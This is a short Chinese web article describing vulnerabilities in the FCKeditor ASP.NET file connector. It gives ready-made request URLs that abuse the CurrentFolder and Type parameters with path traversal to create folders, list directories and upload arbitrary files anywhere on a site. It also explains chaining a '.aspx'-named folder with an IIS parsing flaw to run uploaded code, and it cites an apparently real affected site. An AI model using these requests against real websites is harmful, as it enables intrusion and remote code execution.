手机
当前位置:查字典教程网 >编程开发 >网页编辑器 >FCKeditor 新闻组件的一些程序漏洞
FCKeditor 新闻组件的一些程序漏洞
摘要:1CurrentFolder参数,可以在网站中不同目录新建文件夹,参数使用../../来篡改参数,进入不同的目录/browser/defau...

1 CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp

2 CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过XML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。

/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp

5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。

【FCKeditor 新闻组件的一些程序漏洞】相关文章:

FCKeidtor 清除编辑器内容的代码

CKEditor 取消转义的两种方法

FCKeditor 在chrome中不显示问题

ASP下使用FCKeditor在线编辑器的方法

FckEditor 中文配置手册详细说明

FCKeditor2.3 For PHP 详细整理的使用参考

eWebEditor 请选择一个有效的文件的解决方法

FCKeditor 2.6 编码错误导致修改的内容出现乱码的解决方法

Office文档在线编辑的一个实现方法

FCKeditor 图片上传进度条不动的解决方法

精品推荐
分类导航